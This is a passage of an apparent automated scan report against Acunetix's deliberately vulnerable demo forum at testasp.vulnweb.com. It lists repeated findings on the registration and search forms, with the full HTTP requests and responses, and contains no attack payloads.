href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmSearch" method="get" action=""> |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
